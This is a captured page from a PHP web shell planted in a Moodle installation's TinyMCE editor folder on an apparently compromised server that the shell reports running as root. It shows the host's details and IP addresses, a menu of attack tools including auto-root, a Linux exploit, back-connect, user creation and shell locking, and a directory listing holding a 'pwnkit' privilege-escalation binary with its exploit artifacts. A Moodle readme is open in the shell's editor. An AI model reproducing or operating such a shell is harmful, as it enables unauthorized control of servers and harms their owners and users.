Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle.backup.39 /
lib /
editor /
tinymce /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxrwxr-x
cli
[ DIR ]
drwxrwxr-x
db
[ DIR ]
drwxrwxr-x
lang
[ DIR ]
drwxrwxr-x
plugins
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
tiny_mce
[ DIR ]
drwxrwxr-x
.mad-root
0
B
-rw-r--r--
adminlib.php
7.9
KB
-rw-rw-r--
all_strings.php
3.43
KB
-rw-rw-r--
lib.php
9.79
KB
-rw-rw-r--
module.js
6.64
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
readme_moodle.txt
1.31
KB
-rw-rw-r--
settings.php
3.06
KB
-rw-rw-r--
styles.css
514
B
-rw-rw-r--
subplugins.php
2.08
KB
-rw-rw-r--
thirdpartylibs.xml
231
B
-rw-rw-r--
upgrade.txt
1001
B
-rw-rw-r--
version.php
1.29
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme_moodle.txt
Description of TinyMCE library integration in Moodle ========================================================================================= Copyright: (c) 2004-2012, Moxiecode Systems AB, All rights reserved. License: GNU LESSER GENERAL PUBLIC LICENSE Version 2.1, February 1999 Moodle maintainer: Petr Skoda (skodak) ========================================================================================= Upgrade procedure: 1/ extract standard TinyMCE package into lib/editor/tinymce/tiny_mce/x.y.z/ 2/ bump up editor version in lib.php to match the directory name x.y.z 3/ bump up main version.php 4/ update ./thirdpartylibs.xml 5/ execute cli/update_lang_files.php and review changes in lang/en/editor_tinymce.php Changes: - MDL-62381 - Icon sizing is being overwritten on images. - lib/editor/tinymce/tiny_mce/3.5.11/plugins/fullscreen/editor_plugin_src.js:31-33 - Added checks to see if required functions exist. After these changes you need to use uglifier to compress the js into lib/editor/tinymce/tiny_mce/3.5.11/plugins/fullscreen/editor_plugin.js (I used "uglifyjs editor_plugin_src.js -c -m -v -o editor_plugin.js") Copy the moodle skin to the new version: lib/editor/tinymce/tiny_mce/3.5.10/theme/advanced/skins/moodle/ TODO: * create some new automated script that sends other languages from upstream into AMOS
Close